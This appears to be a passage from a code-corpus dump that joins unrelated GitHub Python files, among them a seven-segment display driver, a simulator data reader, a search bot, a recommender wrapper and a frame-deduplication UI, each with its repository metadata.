import lut\n\n\nclass DigitLUT(lut.FunctionLUT):\n \"\"\"Maps decimal digits to their seven-segment encoding.\"\"\"\n\n # 7-bit encoding of segments A-G, indexed by value\n TABLE = [\n 0b0111111,\n 0b0000110,\n 0b1011011,\n 0b1001111,\n 0b1100110,\n 0b1101101,\n 0b1111101,\n 0b0000111,\n 0b1111111,\n 0b1101111,\n ]\n\n def __init__(self, input: Signal):\n super().__init__(\n lambda i: self.TABLE[i] if i < 10 else 0,\n input=input,\n output=Signal(8, name='output'))\n\n\nclass HexDigitLUT(lut.FunctionLUT):\n 
\"\"\"Maps hexadecimal digits to their seven-segment encoding.\"\"\"\n\n # 7-bit encoding of segments A-G, indexed by value\n TABLE = DigitLUT.TABLE + [\n 0b1110111,\n 0b1111100,\n 0b0111001,\n 0b1011110,\n 0b1111001,\n 0b1110001,\n ]\n\n def __init__(self):\n super().__init__(\n self.TABLE.__getitem__,\n input=Signal(4, name='input'),\n output=Signal(8, name='output'))\n\n\nclass BCDRenderer(Elaboratable):\n \"\"\"Render multiple BCD digits, omitting leading zeros.\"\"\"\n\n def __init__(self, input: [Signal]):\n super().__init__()\n assert len(input) != 0\n self.input = input\n self.start = Signal(reset=0)\n self.output = [Signal(8) for _ in input]\n self.done = Signal(reset=0)\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n input = Signal(4 * len(self.input))\n current_input = input[-4:]\n output = Cat(*self.output)\n current_output = Signal(8)\n cursor = Signal(range(len(self.input)), reset=len(self.input) - 1)\n seen_nonzero = Signal()\n m.submodules.lut = lut = DigitLUT(current_input)\n with m.FSM(reset='IDLE'):\n with m.State('IDLE'):\n with m.If(self.start):\n m.d.sync += input.eq(Cat(*self.input))\n m.d.sync += cursor.eq(cursor.reset)\n m.d.sync += seen_nonzero.eq(0)\n m.next = 'CONVERT'\n with m.State('CONVERT'):\n is_zero = (current_input == 0).bool()\n leading_zero = ~seen_nonzero.bool() & is_zero\n blank_zero = leading_zero & (cursor != 0).bool()\n with m.If(blank_zero):\n m.d.comb += current_output.eq(0)\n with m.Else():\n m.d.comb += current_output.eq(lut.output)\n m.d.sync += cursor.eq(cursor - 1)\n m.d.sync += seen_nonzero.eq(seen_nonzero | ~is_zero)\n with m.If(cursor == 0):\n m.next = 'DONE'\n m.d.sync += self.done.eq(1)\n m.d.sync += input.eq(input << 4)\n m.d.sync += output.eq(Cat(current_output, output[:-8]))\n with m.State('DONE'):\n m.d.sync += self.done.eq(0)\n m.next = 'IDLE'\n return m\n\n\nclass DisplayBank(Record):\n \"\"\"Output signal record for a bank of eight common-anode displays.\"\"\"\n\n _LAYOUT = Layout([\n ('segments', 8),\n ('anodes', 8),\n ])\n\n def __init__(self, **kwargs):\n super().__init__(self._LAYOUT, fields=kwargs)\n\n\nclass SingleDisplayValue(Record):\n \"\"\"Request record for the pattern and PWM duty cycle for a single display.\n\n This specifies how ArrayDisplayMultiplexer should drive one of the displays in\n its display bank.\n \"\"\"\n\n _LAYOUT = Layout([\n ('segments', 8),\n ('duty_cycle', 8),\n ])\n\n def __init__(self, **kwargs):\n super().__init__(self._LAYOUT, fields=kwargs)\n\n\nclass DisplayMultiplexer(Elaboratable):\n\n def __init__(self, output: DisplayBank,\n num_segments: int = 8, pwm_width: int = 8):\n super().__init__()\n self.output = output\n self.num_segments = num_segments\n self.pwm_width = pwm_width\n self.segments = Signal(8)\n self.duty_cycle = Signal(pwm_width)\n self.select = Signal(range(num_segments), reset=0)\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n # Output data + PWM to the display selected by ``select``\n m.submodules.pwm = pwm = pwm_module.PWM(Signal(self.pwm_width))\n m.d.comb += pwm.duty_cycle.eq(self.duty_cycle)\n m.d.comb += self.output.segments.eq(self.segments)\n for i in range(self.num_segments):\n with m.If((self.select == i) & self.segments.any()):\n m.d.comb += self.output.anodes[i].eq(pwm.output)\n with m.Else():\n m.d.comb += self.output.anodes[i].eq(0)\n # Let the PWM run for 8 steps per display. 
The resulting refresh rate\n # should be 100 MHz / 256 / 8 ~= 50 kHz.\n strobe_counter = Signal(range(8), reset=0)\n with m.If(pwm.strobe):\n m.d.sync += strobe_counter.eq(strobe_counter + 1)\n with m.If(strobe_counter == 7):\n m.d.sync += self.select.eq(self.select + 1)\n return m\n\n\nclass ArrayDisplayMultiplexer(Elaboratable):\n \"\"\"Multiplex a bank of eight common-anode seven-segment displays.\n\n Arbitrary patterns are supported and can be generated by BCDRenderer. The\n multiplexer also supports individual PWM duty cycle for each display in the\n bank.\n \"\"\"\n\n def __init__(self, inputs: Array, output: DisplayBank):\n super().__init__()\n assert len(inputs) == 8\n self.inputs = inputs\n self.output = output\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n m.submodules.mux = mux = DisplayMultiplexer(self.output)\n m.d.comb += mux.segments.eq(self.inputs[mux.select].segments)\n m.d.comb += mux.duty_cycle.eq(self.inputs[mux.select].duty_cycle)\n return m\n\n\nclass DisplayMultiplexerDemo(Elaboratable):\n \"\"\"Simple demo for the display multiplexer.\n\n This demo displays a static pattern. Each display in the bank displays its\n index (in decimal) and uses the same index as its PWM duty cycle (in\n increments of 12.5%).\n \"\"\"\n\n def __init__(self, segments, anodes):\n super().__init__()\n self.segments = segments\n self.anodes = anodes\n\n def elaborate(self, _: Platform) -> Module:\n m = Module()\n display_values = []\n for i in range(8):\n val = SingleDisplayValue(segments=Signal(8), duty_cycle=Signal(8))\n m.d.comb += val.segments.eq(DigitLUT.TABLE[i])\n m.d.comb += val.duty_cycle.eq((i * 255) // 7)\n display_values.append(val)\n # Display the output\n display = DisplayBank(segments=Signal(8), anodes=Signal(8))\n m.d.comb += self.segments.eq(display.segments)\n m.d.comb += self.anodes.eq(display.anodes)\n m.submodules.dispmux = ArrayDisplayMultiplexer(\n inputs=Array(display_values),\n output=display)\n return m\n","repo_name":"sjolsen/nmigen-nexys","sub_path":"display/seven_segment.py","file_name":"seven_segment.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"39222422216","text":"import mmap\nfrom ctypes import *\nimport binascii\nimport re\nimport numpy as np\nfrom PIL import Image\nimport PIL.Image as img\nfrom cv2 import cv2 as cv\n\nclass Position(Structure):\n _fields_= [(\"x\", c_float),(\"y\", c_float),(\"z\",c_float)]\n\nclass PC_info(Structure):\n _fields_= [(\"point_position\",Position),(\"padding\",c_int)]\n\nclass PointCloudPackage(Structure):\n _fields_= [(\"dataLength\", c_int),(\"pointCloudInfo\", POINTER(PC_info))]\n\nclass pixel_structure(Structure):\n _fields_= [(\"R\",c_int8),(\"G\",c_int8),(\"B\",c_int8),(\"A\",c_int8)]\n\nclass VideoStreamPack(Structure):\n _fields_= [(\"data\", POINTER(POINTER(pixel_structure))),(\"height\",c_int)\n ,(\"width\", c_int), (\"num_camera\", c_int)]\n\nclass car_info(Structure):\n _fields_= [(\"speed\", c_float),(\"car_position_x\", c_float)\n ,(\"car_position_y\", c_float), (\"car_position_z\", c_float)]\n\nclass AlgInformation(Structure):\n _fields_= [(\"steeringMechanism_TuringRate\", c_float),(\"brakingMechanism_BrakingRate\", c_float)\n ,(\"engineMechanism_ThrottleRate\", c_float), (\"message\", c_char*200)]\n\nclass BoundingBoxInfomation:\n topLeft = []\n heightWidth = []\n\nPoints = []\n\nc_dll = cdll.LoadLibrary(\"SM_Access.dll\")\ng_carPos = c_dll.GetCarPosition\ng_carPos.restype = 
Position\ng_PCData = c_dll.GetPointCloudData\ng_PCData.restype = PointCloudPackage\ng_CameraData =c_dll.GetCarCameraData\ng_CameraData.restype = VideoStreamPack\ng_FreePointCloudData = c_dll.FreePointCloudMemary\ng_freeMemary = c_dll.FreeAllocatedMemary\ng_CarInformation = c_dll.GetCarInformation\ng_CarInformation.restype = car_info\ng_BoundingBoxInfomation = c_dll.GetBoundingBoxInfo\nw_CarControllerCommand = c_dll.writeAlgControllerCommand\n\n\nhasShown = 0\n\ndef _packeageTestFunction():\n \n buff1 = g_carPos()\n #print(\"Car position: \",buff1.x,\" \",buff1.y,\" \",buff1.z)\n\n PC_Origin = []\n for i in range(12):\n buff2 = g_PCData()\n \n\n PC_Origin = np.ctypeslib.as_array(cast(buff2.pointCloudInfo, POINTER(c_float))\n , (buff2.dataLength, 4))\n\n g_FreePointCloudData()\n \n \n #print(\"Points: \",buff2.dataLength)\n\n buff3 = g_CameraData()\n\n data = []\n img_bytes = []\n for i in range(buff3.num_camera):\n img_origin = np.ctypeslib.as_array(cast(buff3.data[i], POINTER(c_ubyte))\n , (buff3.height, buff3.width, 4))\n #img_buf = np.delete(img_origin, -1, axis=1)\n img_bytes.append(img_origin)\n\n global hasShown\n if(hasShown == 2):#change to 0 when debug\n t_image = Image.fromarray(img_bytes[0]).convert('RGB')\n Image._show(Image.fromarray(np.array(cv.cvtColor(np.array(t_image),cv.COLOR_BGR2RGB))))\n t_image1 = Image.fromarray(img_bytes[1]).convert('RGB')\n Image._show(Image.fromarray(np.array(cv.cvtColor(np.array(t_image1),cv.COLOR_BGR2RGB))))\n t_image2 = Image.fromarray(img_bytes[2]).convert('RGB')\n Image._show(Image.fromarray(np.array(cv.cvtColor(np.array(t_image2),cv.COLOR_BGR2RGB))))\n hasShown = 1\n \n t_image = Image.fromarray(img_bytes[0])\n cv.imshow(\"Camera1\", cv.resize(np.array(t_image), (320,240), interpolation=cv.INTER_AREA))\n t_image1 = Image.fromarray(img_bytes[1])\n cv.imshow(\"Camera2\", cv.resize(np.array(t_image1), (320,240), interpolation=cv.INTER_AREA))\n t_image2 = Image.fromarray(img_bytes[2])\n cv.imshow(\"Camera3\", cv.resize(np.array(t_image2), (320,240), interpolation=cv.INTER_AREA))\n cv.waitKey(1)\n \n Points = []\n \n g_freeMemary()\n '''\n for i in range(buff3.num_camera):\n for j in range(buff3.width * buff3.height):\n data.append(buff3.data[i][j])\n \n print(\"Data: \",data.__len__())\n \n\n Points = []\n data = []\n '''\n\n\"\"\"Return the Car camera gray image data and the car position\"\"\"\ndef aquireImageData(isGray = False, hasBoundingBox = False):\n out_CarPosition = []\n out_CameraImage = []\n\n buff1 = g_carPos()\n out_CarPosition = [buff1.x,buff1.y,buff1.z]\n\n buff3 = g_CameraData()\n img_bytes = []\n for i in range(buff3.num_camera):\n img_origin = np.ctypeslib.as_array(cast(buff3.data[i], POINTER(c_ubyte))\n , (buff3.height, buff3.width, 4))\n #img_buf = np.delete(img_origin, -1, axis=1)\n img_bytes.append(img_origin)\n t_image1 = Image.fromarray(img_bytes[0]).convert('RGB')\n t_image2 = Image.fromarray(img_bytes[1]).convert('RGB')\n t_image3 = Image.fromarray(img_bytes[2]).convert('RGB')\n\n if isGray:\n out_CameraImage = [np.array(cv.cvtColor(np.array(t_image1),cv.COLOR_BGR2GRAY)),\n np.array(cv.cvtColor(np.array(t_image2),cv.COLOR_BGR2GRAY)),\n np.array(cv.cvtColor(np.array(t_image3),cv.COLOR_BGR2GRAY))]\n else:\n out_CameraImage = [np.array(cv.cvtColor(np.array(t_image1),cv.COLOR_BGR2RGB)),\n np.array(cv.cvtColor(np.array(t_image2),cv.COLOR_BGR2RGB)),\n np.array(cv.cvtColor(np.array(t_image3),cv.COLOR_BGR2RGB))]\n \n if(hasBoundingBox):\n DatasetInfo = dict()\n buffer = create_string_buffer(4*10000)\n 
g_BoundingBoxInfomation(buffer)\n str_data = str(buffer.value,encoding='utf-8')\n camera_data = str_data.split('\\n')[:-1]\n for line in camera_data:\n line_info = re.split(\" |,|;\",line)\n DatasetInfo[line_info[0][6]] = []\n for i in range(int((len(line_info)-1)/4)):\n DatasetInfo[line_info[0][6]].append([int(float(line_info[4*i+1])),int(float(line_info[4*i+2])),\n int(float(line_info[4*i+3])),int(float(line_info[4*i+4]))])\n\n g_freeMemary()\n\n if(not hasBoundingBox):\n return out_CarPosition,out_CameraImage\n else:\n return [out_CarPosition,out_CameraImage,DatasetInfo]\n\n\n\"\"\"Return the Lidar point cloud data and the car position\"\"\"\ndef aquirePointCloudData():\n out_CarPosition = []\n out_PointCloud = []\n\n buff1 = g_carPos()\n out_CarPosition = [buff1.x,buff1.y,buff1.z]\n\n for i in range(12):\n buff2 = g_PCData()\n out_PointCloud = np.ctypeslib.as_array(cast(buff2.pointCloudInfo, POINTER(c_float))\n , (buff2.dataLength, 4))\n out_PointCloud = np.delete(out_PointCloud, -1, axis=1)\n\n g_FreePointCloudData()\n\n return out_CarPosition,out_PointCloud\n\n\"\"\"Return the car position\"\"\"\ndef aquireCarPosition():\n out_CarPosition = []\n\n buff1 = g_carPos()\n out_CarPosition = [buff1.x,buff1.y,buff1.z]\n\n return out_CarPosition\n\ndef aquireCarInformation():\n buff1 = g_CarInformation()\n\n out_speed = buff1.speed\n return out_speed\n\ndef writeAlgControllerSharedMemary(in_command):\n writeInfo = AlgInformation()\n writeInfo.steeringMechanism_TuringRate = in_command[0]\n writeInfo.brakingMechanism_BrakingRate = in_command[1]\n writeInfo.engineMechanism_ThrottleRate = in_command[2]\n w_CarControllerCommand(writeInfo)\n\nif __name__ == \"__main__\":\n while True:\n #aquireDatasetInfomation()\n #_packeageTestFunction()\n #print(aquireCarInformation())\n aquireImageData()\n \"\"\"_,img = aquireImageData()\n Image.fromarray(img[0]).save(\"Output1.png\")\n Image.fromarray(img[1]).save(\"Output2.png\")\n Image.fromarray(img[2]).save(\"Output3.png\")\"\"\"\n #print(aquireCarPosition())\n #print(aquirePointCloudData())","repo_name":"GGzhangBOY/AlgContainer","sub_path":"DataReceiver.py","file_name":"DataReceiver.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37422228481","text":"import jieba\nimport os, sys\nimport re\n\nsys.path.append(os.getcwd())\nfrom summary import SummaryAcquirer\nfrom comments.category import MovieCategoryAcquirer\nfrom jieba import analyse\n\n\nclass KeywordsAnalyzer:\n def __init__(self, every_summary):\n global content\n self.every_summary = every_summary\n\n # 清洗数据\n def handle_word(self):\n hello = []\n # 分词\n for m in self.every_summary.values():\n after_cut = jieba.lcut(m, cut_all=False)\n # 去停用词\n for i in set(after_cut):\n if re.match(r'\\w+', i) and i not in content:\n hello.append(i)\n return hello\n\n # 关键词分析\n def text_rank(self):\n for m, n in zip(self.every_summary.keys(), self.every_summary.values()):\n self.keywords = analyse.textrank(n,\n topK=10,\n withWeight=False,\n allowPOS=('ns', 'n', 'vn', 'n'))\n print(m, self.keywords)\n return self.keywords\n\n\nif __name__ == '__main__':\n cat_list = MovieCategoryAcquirer().acquire_category()\n category_obj = cat_list[0]\n s = SummaryAcquirer(category_obj)\n k = KeywordsAnalyzer(s.get_summary())\n keywords_dict = 
k.text_rank()\n","repo_name":"Bonkkerrs/BUSS1301-Python-Team-Project","sub_path":"keywords/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38446128635","text":"\"\"\"Duckduckgo bot command\"\"\"\nimport urllib.parse\nfrom typing import Optional, List\nimport bs4\nimport requests\n\nfrom sadbot.command_interface import CommandInterface, BOT_HANDLER_TYPE_MESSAGE\nfrom sadbot.message import Message\nfrom sadbot.bot_action import BotAction, BOT_ACTION_TYPE_REPLY_TEXT\n\n\nclass DdgBotCommand(CommandInterface):\n \"\"\"This is the Duckduckgo bot command class\"\"\"\n\n @property\n def handler_type(self) -> int:\n \"\"\"Returns the type of event handled by the command\"\"\"\n return BOT_HANDLER_TYPE_MESSAGE\n\n @property\n def command_regex(self) -> str:\n \"\"\"Returns the regex for matching Duckduckgo commands\"\"\"\n return r\"((!|\\.)([Dd]{2}[Gg])).*\"\n\n def get_reply(self, message: Optional[Message] = None) -> Optional[List[BotAction]]:\n \"\"\"Returns reply for Duckduckgo command\"\"\"\n if message is None or message.text is None:\n return None\n query = \" \".join(message.text.split(\" \")[1:])\n headers = {\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)\"\n + \"Gecko/20100101 Firefox/98.0\",\n }\n url = \"https://html.duckduckgo.com/html/\"\n data = f\"q={urllib.parse.quote(query)}&b=&kl=&df=\"\n try:\n req = requests.post(url, headers=headers, data=data)\n soup = bs4.BeautifulSoup(req.text, \"html.parser\")\n except requests.RequestException:\n return None\n results = soup.find_all(\"div\", attrs={\"class\": \"result\"})\n counter = 1\n answer = f\"Results from [Duck Duck Go](https://duckduckgo.com) for {query}:\\n\"\n for result in results:\n s_result = result.find_next(\"a\", attrs={\"class\": \"result__a\"})\n link = s_result.attrs.get(\"href\")\n title = s_result.text\n link = link.replace(\"https://\", \"\")\n answer += f\"{counter}. 
[{title}]({urllib.parse.quote(link)})\\n\"\n counter += 1\n return [\n BotAction(\n BOT_ACTION_TYPE_REPLY_TEXT,\n reply_text=answer,\n reply_text_parse_mode=\"Markdown\",\n )\n ]\n","repo_name":"hydrastro/sadbot","sub_path":"sadbot/commands/ddg.py","file_name":"ddg.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"28748880315","text":"class Solution:\n def removeOuterParentheses(self, S):\n stack = []\n output = \"\"\n start, end = 0, 0\n for char in S:\n if char == '(':\n stack.append(char)\n else:\n stack = stack[:-1]\n if len(stack) == 0:\n p = self.removeOuter(S, start, end)\n # print start,end\n # print p\n output += p\n start = end + 1\n end += 1\n \n return output\n def removeOuter(self, S, start, end):\n return S[start + 1:end]\n","repo_name":"sksanjiv77/leetcode","sub_path":"1021-remove-outermost-parentheses/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22442638071","text":"while True:\n try:\n n = int(input('Enter the value whose factorial you want to calculate: '))\n except:\n print('\\nInvalid value!\\n')\n n = 0\n if (n <= 0 or n >= 16):\n print('The value must be a positive integer between 0 and 16!\\n')\n elif(0 Union[MyFMRegressor]:\n if algorithm == Algorithm.BayesianFactorizationMachine:\n return MyFMRegressor(rank=10)\n else:\n print(\"Exception: The algorithm could not be identified.\")\n raise Exception\n\n\ndef fit_and_predict(train: pd.DataFrame, test: pd.DataFrame, algorithm: Algorithm) -> Tuple[pd.DataFrame, float, float]:\n # choose model\n print(f\"Evaluating myfm algorithm {algorithm.name}.\")\n recommender = get_base_model(algorithm)\n\n # data has to be one-hot encoded\n ohe = OneHotEncoder(handle_unknown='ignore')\n # start fitting\n fit_start_time = time.time()\n recommender.fit(ohe.fit_transform(train.drop(columns=[\"rating\"])), train[\"rating\"].values, n_iter=200,\n n_kept_samples=200)\n fit_duration = time.time() - fit_start_time\n print(f\"Algorithm fitted in {fit_duration} seconds.\")\n\n # predict\n predict_start_time = time.time()\n prediction = recommender.predict(ohe.transform(test.drop(columns=[\"rating\"])))\n predict_duration = time.time() - predict_start_time\n print(f\"Algorithm predicted in {predict_duration} seconds.\")\n\n return prediction, fit_duration, predict_duration\n\n\ndef train_best_model(data: pd.DataFrame, algorithm: Algorithm) -> MyFMRegressor:\n # train the best recommender based on predictions\n recommender = get_base_model(algorithm)\n if recommender is not None:\n print(f\"Training best algorithm {algorithm.name} on supplied data.\")\n ohe = OneHotEncoder(handle_unknown='ignore')\n recommender.fit(ohe.fit_transform(data.drop(columns=[\"rating\"])), data[\"rating\"].values, n_iter=200,\n n_kept_samples=200)\n print(f\"Done.\")\n return recommender\n else:\n print(f\"Exception: Algorithm {algorithm.name} could not be built.\")\n raise Exception\n","repo_name":"ISG-Siegen/camels","sub_path":"camels/wrapper_myfm.py","file_name":"wrapper_myfm.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4001111724","text":"from tensorflow.python.data.ops import dataset_ops\nfrom tensorflow.python.data.ops import directed_interleave_op\nfrom tensorflow.python.data.util import 
structure\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_spec\nfrom tensorflow.python.types import data as data_types\n\n\ndef _choose_from_datasets( # pylint: disable=unused-private-name\n datasets, choice_dataset, stop_on_empty_dataset=True\n):\n \"\"\"See `Dataset.choose_from_datasets()` for details.\"\"\"\n\n if not datasets:\n raise ValueError(\"Invalid `datasets`. `datasets` should not be empty.\")\n if not isinstance(choice_dataset, data_types.DatasetV2):\n raise TypeError(\n \"Invalid `choice_dataset`. `choice_dataset` should be a \"\n f\"`tf.data.Dataset` but is {type(choice_dataset)}.\"\n )\n if not structure.are_compatible(\n choice_dataset.element_spec, tensor_spec.TensorSpec([], dtypes.int64)\n ):\n raise TypeError(\n \"Invalid `choice_dataset`. Elements of `choice_dataset` \"\n \"must be scalar `tf.int64` tensors but are \"\n f\"{choice_dataset.element_spec}.\"\n )\n # Replicates the `choice_dataset` component so that each split makes choices\n # independently. This avoids the need for prohibitively expensive\n # cross-split coordination.\n # pylint: disable=protected-access\n choice_dataset = dataset_ops._apply_rewrite(\n choice_dataset, \"replicate_on_split\"\n )\n return directed_interleave_op._directed_interleave( # pylint: disable=protected-access\n choice_dataset, datasets, stop_on_empty_dataset\n )\n","repo_name":"tensorflow/tensorflow","sub_path":"tensorflow/python/data/ops/choose_from_datasets_op.py","file_name":"choose_from_datasets_op.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":178918,"dataset":"github-code","pt":"18"} +{"seq_id":"25106502118","text":"from typing import Callable, Dict\nfrom .model import DataSchema, DataType\nimport pandas as pd\n\nclass ValidationError(Exception):\n pass\n\ndef base_validate(v, _type):\n if isinstance(v, _type):\n return True\n elif isinstance(v, str):\n try:\n return _type(v)\n except ValueError:\n raise ValidationError\n else:\n # neither an instance of _type nor a string that can be converted\n raise ValidationError\n\ndef validate_str(v):\n if isinstance(v, str):\n return v\n elif isinstance(v, bytes):\n return v.decode()\n else:\n raise ValidationError\n\ndef dummy_validate(v):\n return v\n\nvalidate_int = lambda x: base_validate(x, int)\nvalidate_float = lambda x: base_validate(x, float)\nvalidate_bit = lambda x: base_validate(x, bool)\n\n\nvalidator_map:Dict[DataType, Callable] = {\n DataType.STRING: validate_str,\n DataType.INTEGER: validate_int,\n DataType.FLOAT: validate_float,\n DataType.BIT: validate_bit,\n DataType.DATE: dummy_validate,\n DataType.DATETIME: dummy_validate\n}\n\ndef validate_column_list(df: pd.DataFrame, schema: DataSchema):\n try:\n assert set([f.name for f in schema.fields]).issubset(df.columns)\n except AssertionError:\n raise ValidationError\n\ndef validate(df: pd.DataFrame, schema: DataSchema):\n validate_column_list(df, schema)\n for rec in df.itertuples(index=False):\n for f in schema.fields:\n try:\n val = getattr(rec, f.name)\n validator = validator_map[f.type_]\n validator(val)\n except AttributeError:\n raise ValidationError\n ","repo_name":"andremuench/data_onboarding","sub_path":"components/svc/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29130857693","text":"\"\"\"Duplicate Frames Report feature UI and event handlers\"\"\"\nimport os\nfrom typing import Callable\nimport gradio as gr\nfrom webui_utils.simple_config import 
SimpleConfig\nfrom webui_utils.simple_icons import SimpleIcons\nfrom webui_tips import WebuiTips\nfrom webui_utils.auto_increment import AutoIncrementDirectory\nfrom interpolate_engine import InterpolateEngine\nfrom tabs.tab_base import TabBase\nfrom deduplicate_frames import DeduplicateFrames\n\nclass DuplicateFramesReport(TabBase):\n \"\"\"Encapsulates UI elements and events for the Duplicate Frames Report feature\"\"\"\n def __init__(self,\n config : SimpleConfig,\n engine : InterpolateEngine,\n log_fn : Callable):\n TabBase.__init__(self, config, engine, log_fn)\n\n def render_tab(self):\n \"\"\"Render tab into UI\"\"\"\n min_threshold = self.config.deduplicate_settings[\"min_threshold\"]\n max_threshold = self.config.deduplicate_settings[\"max_threshold\"]\n default_threshold = self.config.deduplicate_settings[\"default_threshold\"]\n threshold_step = self.config.deduplicate_settings[\"threshold_step\"]\n def_max_dupes = self.config.deduplicate_settings[\"max_dupes_per_group\"]\n max_lines = self.config.deduplicate_settings[\"max_lines\"]\n max_max_dupes = self.config.deduplicate_settings[\"max_max_dupes\"]\n with gr.Tab(\"Duplicate Frames Report\"):\n gr.Markdown(SimpleIcons.DOCUMENT + \"Detect and report duplicate PNG frame files\")\n with gr.Row():\n input_path_text = gr.Text(max_lines=1, label=\"Input PNG Files Path\",\n placeholder=\"Path on this server to the PNG files to be reported on\")\n with gr.Row():\n threshold = gr.Slider(value=default_threshold, minimum=min_threshold,\n maximum=max_threshold, step=threshold_step, label=\"Detection Threshold\")\n max_dupes = gr.Slider(value=def_max_dupes, minimum=0, maximum=max_max_dupes, step=1,\n label=\"Maximum Duplicates Per Group (0 = no limit, 1 = no duplicates allowed)\")\n with gr.Row():\n report_button = gr.Button(\"Create Report\", variant=\"primary\")\n with gr.Row():\n file_output = gr.File(type=\"file\", file_count=\"multiple\", label=\"Download\",\n visible=False)\n with gr.Row():\n output_text = gr.Textbox(label=\"Report\", max_lines=max_lines, interactive=False)\n with gr.Accordion(SimpleIcons.TIPS_SYMBOL + \" Guide\", open=False):\n WebuiTips.duplicates_report.render()\n report_button.click(self.create_report, inputs=[input_path_text, threshold, max_dupes],\n outputs=[file_output, output_text])\n\n def create_report(self,\n input_path : str,\n threshold : int,\n max_dupes : int):\n \"\"\"Create Report button handler\"\"\"\n if input_path:\n try:\n report = DeduplicateFrames(None,\n input_path,\n None,\n threshold,\n max_dupes,\n None,\n self.log).invoke_report(suppress_output=True)\n\n base_output_path = self.config.directories[\"output_deduplication\"]\n output_path, run_index = AutoIncrementDirectory(base_output_path).next_directory(\n \"run\")\n output_basename = \"duplicate_frames_report\"\n self.log(f\"creating duplicate frames report at {output_path}\")\n\n info_file = os.path.join(output_path, output_basename + str(run_index) + \".txt\")\n with open(info_file, \"w\", encoding=\"UTF-8\") as file:\n file.write(report)\n return gr.update(value=[info_file], visible=True), gr.update(value=report,\n visible=True)\n\n except RuntimeError as error:\n message = \\\nf\"\"\"Error creating report:\n{error}\"\"\"\n return gr.update(value=None, visible=False), gr.update(value=message, 
visible=True)\n","repo_name":"jhogsett/EMA-VFI-WebUI","sub_path":"tabs/dedupe_report_ui.py","file_name":"dedupe_report_ui.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"18"} +{"seq_id":"39994121418","text":"from sqlalchemy import Column, Integer, String, BigInteger\n\nfrom pydantic import BaseModel\nfrom typing import Optional, List\nfrom entity import Base\n\n\"\"\"\nArticle list\n\"\"\"\n\n\n# Database object for articles (SQLAlchemy model)\nclass DbContent(Base):\n __tablename__ = 'tb_content'\n # id\n id = Column(BigInteger(), primary_key=True)\n # Article title\n title = Column(String())\n # .md file name\n file_name = Column(String())\n # Menu id\n menu_id = Column(BigInteger())\n # Creation time\n create_time = Column(String())\n\n\n# Article object (Pydantic model)\nclass Content(BaseModel):\n # id\n id: Optional[int] = None\n # Article title\n title: str\n # .md file name\n file_name: str\n # Menu id\n menu_id: Optional[int] = 0\n # Creation time\n create_time: Optional[str] = None\n\n class Config:\n orm_mode = True\n\n\n# Article query\nclass ContentReq(BaseModel):\n menu_id: Optional[str] = None\n page: int\n pageSize: int\n","repo_name":"twodogleee/lite-blog","sub_path":"entity/ContentEntity.py","file_name":"ContentEntity.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"194449687","text":"import tensorflow as tf\nfrom tensorflow.python.platform import gfile\n\nGRAPH_PB_PATH = r'C:\\tensorflow\\plate_detector2\\models\\1306\\out-7252\\frozen_inference_graph.pb' #path to your .pb file\nwith tf.Session() as sess:\n print(\"load graph\")\n with gfile.FastGFile(GRAPH_PB_PATH,'rb') as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n sess.graph.as_default()\n tf.import_graph_def(graph_def, name='')\n graph_nodes=[n for n in graph_def.node]\n\nwts = [n for n in graph_nodes if n.op=='Const']\n\nfrom tensorflow.python.framework import tensor_util\n\n\ntxt_file = open(\"weights.txt\",\"w\") \n\nfor n in wts:\n print(\"Name of the node - %s\" % n.name)\n print( \"Value - \") \n print(tensor_util.MakeNdarray(n.attr['value'].tensor))\n txt_file.write(\"Name of the node - %s\" % n.name)\n txt_file.write('\\n')\n txt_file.write( \"Value - \") \n txt_file.write('\\n')\n txt_file.write(str(tensor_util.MakeNdarray(n.attr['value'].tensor)))\n txt_file.write('\\n')\n\ntxt_file.close() ","repo_name":"juliomilani/license_plate_detection","sub_path":"models/out-7252/get_weights.py","file_name":"get_weights.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"40962319666","text":"\"\"\"\nA thin RDBMS-like layer on top of google spreadsheets.\n\nCarlos Scheidegger and Sam Gratzl, 2016\n\nWe recommend you use this under a virtual environment. 
